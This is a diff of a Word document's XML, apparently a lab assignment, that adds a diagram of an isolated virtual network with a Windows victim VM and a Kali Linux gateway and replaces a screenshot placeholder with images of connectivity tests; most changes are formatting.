-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -318,14 +488,14 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -361,7 +531,7 @@
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId14">
+                          <a:blip r:embed="rId9">
                             <a:alphaModFix/>
                           </a:blip>
                           <a:stretch>
@@ -464,7 +634,7 @@
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId15">
+                          <a:blip r:embed="rId10">
                             <a:alphaModFix/>
                           </a:blip>
                           <a:stretch>
@@ -543,7 +713,7 @@
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId16">
+                          <a:blip r:embed="rId11">
                             <a:alphaModFix/>
                           </a:blip>
                           <a:stretch>
@@ -576,7 +746,7 @@
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId17">
+                          <a:blip r:embed="rId12">
                             <a:alphaModFix/>
                           </a:blip>
                           <a:stretch>
@@ -603,7 +773,7 @@
                           <pic:cNvPicPr preferRelativeResize="0"/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId18">
+                          <a:blip r:embed="rId13">
                             <a:alphaModFix/>
                           </a:blip>
                           <a:stretch>
@@ -886,39 +1056,224 @@
               </wp:inline>
             </w:drawing>
           </mc:Choice>
-          <mc:Fallback xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
-            <w:drawing>
-              <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5C9748F2" wp14:editId="7777777">
-                <wp:extent cx="5619750" cy="1794301"/>
-                <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:docPr id="540442525" name="image1.png"/>
-                <a:graphic>
-                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                    <pic:pic>
-                      <pic:nvPicPr>
-                        <pic:cNvPr id="0" name="image1.png"/>
-                        <pic:cNvPicPr preferRelativeResize="0"/>
-                      </pic:nvPicPr>
-                      <pic:blipFill>
-                        <a:blip r:embed="rId19"/>
-                        <a:srcRect/>
-                        <a:stretch>
-                          <a:fillRect/>
-                        </a:stretch>
-                      </pic:blipFill>
-                      <pic:spPr>
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="5619750" cy="1794301"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect"/>
-                        <a:ln/>
-                      </pic:spPr>
-                    </pic:pic>
-                  </a:graphicData>
-                </a:graphic>
-              </wp:inline>
-            </w:drawing>
+          <mc:Fallback>
+            <w:pict>
+              <v:group w14:anchorId="6AEA9684" id="Group 1" o:spid="_x0000_s1026" style="width:442.5pt;height:141.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="140,3851" coordsize="74391,23625" o:gfxdata="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">
+                <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+                  <v:stroke joinstyle="miter"/>
+                  <v:formulas>
+                    <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+                    <v:f eqn="sum @0 1 0"/>
+                    <v:f eqn="sum 0 0 @1"/>
+                    <v:f eqn="prod @2 1 2"/>
+                    <v:f eqn="prod @3 21600 pixelWidth"/>
+                    <v:f eqn="prod @3 21600 pixelHeight"/>
+                    <v:f eqn="sum @0 0 1"/>
+                    <v:f eqn="prod @6 1 2"/>
+                    <v:f eqn="prod @7 21600 pixelWidth"/>
+                    <v:f eqn="sum @8 21600 0"/>
+                    <v:f eqn="prod @7 21600 pixelHeight"/>
+                    <v:f eqn="sum @10 21600 0"/>
+                  </v:formulas>
+                  <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+                  <o:lock v:ext="edit" aspectratio="t"/>
+                </v:shapetype>
+                <v:shape id="Shape 2" o:spid="_x0000_s1027" type="#_x0000_t75" alt="Grayscale desktop computer configuration vector image | Free SVG" style="position:absolute;left:1777;top:10348;width:10876;height:8783;visibility:visible;mso-wrap-style:square" o:preferrelative="f" o:gfxdata="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">
+                  <v:imagedata r:id="rId14" o:title="Grayscale desktop computer configuration vector image | Free SVG"/>
+                </v:shape>
+                <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                  <v:stroke joinstyle="miter"/>
+                  <v:path gradientshapeok="t" o:connecttype="rect"/>
+                </v:shapetype>
+                <v:shape id="Text Box 845040692" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:140;top:19663;width:16002;height:4116;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
+                    <w:txbxContent>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:jc w:val="center"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                        <w:r>
+                          <w:rPr>
+                            <w:color w:val="000000"/>
+                            <w:sz w:val="20"/>
+                          </w:rPr>
+                          <w:t>Victim (Windows 10)</w:t>
+                        </w:r>
+                      </w:p>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:jc w:val="center"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                        <w:r>
+                          <w:rPr>
+                            <w:color w:val="000000"/>
+                            <w:sz w:val="20"/>
+                          </w:rPr>
+                          <w:t>IP: 10.0.0.3</w:t>
+                        </w:r>
+                      </w:p>
+                    </w:txbxContent>
+                  </v:textbox>
+                </v:shape>
+                <v:shapetype id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
+                  <v:path arrowok="t" fillok="f" o:connecttype="none"/>
+                  <o:lock v:ext="edit" shapetype="t"/>
+                </v:shapetype>
+                <v:shape id="Straight Arrow Connector 976022289" o:spid="_x0000_s1029" type="#_x0000_t32" style="position:absolute;left:12653;top:14739;width:10383;height:183;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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" strokeweight="2.25pt">
+                  <v:stroke startarrow="classic" endarrow="classic"/>
+                </v:shape>
+                <v:shape id="Shape 5" o:spid="_x0000_s1030" type="#_x0000_t75" alt="Server icon vector image | Free SVG" style="position:absolute;left:23035;top:10337;width:6308;height:9171;visibility:visible;mso-wrap-style:square" o:preferrelative="f" o:gfxdata="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">
+                  <v:imagedata r:id="rId15" o:title="Server icon vector image | Free SVG"/>
+                </v:shape>
+                <v:shape id="Text Box 1289433572" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:15559;top:19663;width:21261;height:4116;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
+                    <w:txbxContent>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:jc w:val="center"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                        <w:r>
+                          <w:rPr>
+                            <w:color w:val="000000"/>
+                            <w:sz w:val="20"/>
+                          </w:rPr>
+                          <w:t>Gateway and Server (Kali Linux):</w:t>
+                        </w:r>
+                      </w:p>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:jc w:val="center"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                        <w:r>
+                          <w:rPr>
+                            <w:color w:val="000000"/>
+                            <w:sz w:val="20"/>
+                          </w:rPr>
+                          <w:t>IP: 10.0.0.1</w:t>
+                        </w:r>
+                      </w:p>
+                    </w:txbxContent>
+                  </v:textbox>
+                </v:shape>
+                <v:shape id="Shape 7" o:spid="_x0000_s1032" type="#_x0000_t75" alt="File:Folder.svg - Wikipedia" style="position:absolute;left:38877;top:12567;width:4116;height:4116;visibility:visible;mso-wrap-style:square" o:preferrelative="f" o:gfxdata="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" stroked="t">
+                  <v:stroke dashstyle="dash" startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short" joinstyle="round"/>
+                  <v:imagedata r:id="rId16" o:title="Folder"/>
+                </v:shape>
+                <v:shape id="Shape 8" o:spid="_x0000_s1033" type="#_x0000_t75" alt="MoonBook Laptop | Free SVG" style="position:absolute;left:47587;top:9150;width:11362;height:11362;visibility:visible;mso-wrap-style:square" o:preferrelative="f" o:gfxdata="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">
+                  <v:imagedata r:id="rId17" o:title="MoonBook Laptop | Free SVG"/>
+                </v:shape>
+                <v:shape id="Shape 9" o:spid="_x0000_s1034" type="#_x0000_t75" alt="File:Applications-internet.svg - Wikimedia Commons" style="position:absolute;left:66206;top:10651;width:8326;height:8326;visibility:visible;mso-wrap-style:square" o:preferrelative="f" o:gfxdata="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">
+                  <v:imagedata r:id="rId18" o:title="Applications-internet"/>
+                </v:shape>
+                <v:shape id="Straight Arrow Connector 1864630218" o:spid="_x0000_s1035" type="#_x0000_t32" style="position:absolute;left:29343;top:14625;width:9534;height:297;rotation:180;flip:x;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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">
+                  <v:stroke dashstyle="dash"/>
+                </v:shape>
+                <v:shape id="Straight Arrow Connector 1479431982" o:spid="_x0000_s1036" type="#_x0000_t32" style="position:absolute;left:42993;top:14625;width:4593;height:204;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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">
+                  <v:stroke dashstyle="dash"/>
+                </v:shape>
+                <v:shape id="Straight Arrow Connector 854516182" o:spid="_x0000_s1037" type="#_x0000_t32" style="position:absolute;left:58949;top:14813;width:7257;height:18;rotation:180;flip:x;visibility:visible;mso-wrap-style:square" o:connectortype="straight" o:gfxdata="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" strokeweight="2.25pt">
+                  <v:stroke startarrow="classic" endarrow="classic"/>
+                </v:shape>
+                <v:shape id="Text Box 1911493118" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:35638;top:8821;width:10161;height:2616;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
+                    <w:txbxContent>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                        <w:r>
+                          <w:rPr>
+                            <w:color w:val="000000"/>
+                            <w:sz w:val="20"/>
+                          </w:rPr>
+                          <w:t>Shared Folder</w:t>
+                        </w:r>
+                      </w:p>
+                    </w:txbxContent>
+                  </v:textbox>
+                </v:shape>
+                <v:shape id="Text Box 1055531058" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:49866;top:21175;width:6804;height:2616;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
+                    <w:txbxContent>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                        <w:r>
+                          <w:rPr>
+                            <w:color w:val="000000"/>
+                            <w:sz w:val="20"/>
+                          </w:rPr>
+                          <w:t>Host VM</w:t>
+                        </w:r>
+                      </w:p>
+                    </w:txbxContent>
+                  </v:textbox>
+                </v:shape>
+                <v:shape id="Text Box 1052692416" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:65445;top:21175;width:9087;height:2616;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
+                    <w:txbxContent>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                        <w:r>
+                          <w:rPr>
+                            <w:color w:val="000000"/>
+                            <w:sz w:val="20"/>
+                          </w:rPr>
+                          <w:t>The Internet</w:t>
+                        </w:r>
+                      </w:p>
+                    </w:txbxContent>
+                  </v:textbox>
+                </v:shape>
+                <v:rect id="Rectangle 1982763071" o:spid="_x0000_s1041" style="position:absolute;left:998;top:3900;width:34641;height:23577;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:gfxdata="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" filled="f" strokecolor="blue" strokeweight="3pt">
+                  <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short" joinstyle="round"/>
+                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
+                    <w:txbxContent>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                      </w:p>
+                    </w:txbxContent>
+                  </v:textbox>
+                </v:rect>
+                <v:shape id="Text Box 907049617" o:spid="_x0000_s1042" type="#_x0000_t202" style="position:absolute;left:10427;top:3851;width:19335;height:6576;visibility:visible;mso-wrap-style:square;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
+                    <w:txbxContent>
+                      <w:p>
+                        <w:pPr>
+                          <w:spacing w:line="240" w:lineRule="auto"/>
+                          <w:textDirection w:val="btLr"/>
+                        </w:pPr>
+                        <w:r>
+                          <w:rPr>
+                            <w:color w:val="000000"/>
+                            <w:sz w:val="28"/>
+                          </w:rPr>
+                          <w:t>Virtual Network</w:t>
+                        </w:r>
+                      </w:p>
+                    </w:txbxContent>
+                  </v:textbox>
+                </v:shape>
+                <w10:anchorlock/>
+              </v:group>
+            </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
@@ -927,27 +1282,28 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>This network will not be able to access the Internet. The Windows VM will act as a victim, and the Kali Linux VM will act as a network gateway to the victim machines. We will use this gateway to intercept the network traffic and to simulate various services such as DNS or HTTP.</w:t>
       </w:r>
     </w:p>
@@ -955,18 +1311,18 @@
       <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
+          <w:numId w:val="10"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -975,21 +1331,20 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
+          <w:numId w:val="10"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -998,7 +1353,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1007,27 +1362,35 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>” (Kali), “ipconfig” (Windows), successful “ping” commands from EACH machine to the other, and unsuccessful “ping” commands to IP address 8.8.8.8 .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” (Kali), “ipconfig” (Windows), successful “ping” commands from EACH machine to the other, and unsuccessful “ping” commands to IP address </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>8.8.8.8 .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -1036,50 +1399,210 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>PASTE SCREENSHOTS HERE:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="614836D4" wp14:editId="7DD1F9CA">
+            <wp:extent cx="5943600" cy="4457700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1592855158" name="Picture 4" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1592855158" name="Picture 4" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4457700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45CDA03C" wp14:editId="25A54F03">
+            <wp:extent cx="5943600" cy="4457700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="906459127" name="Picture 5" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="906459127" name="Picture 5" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
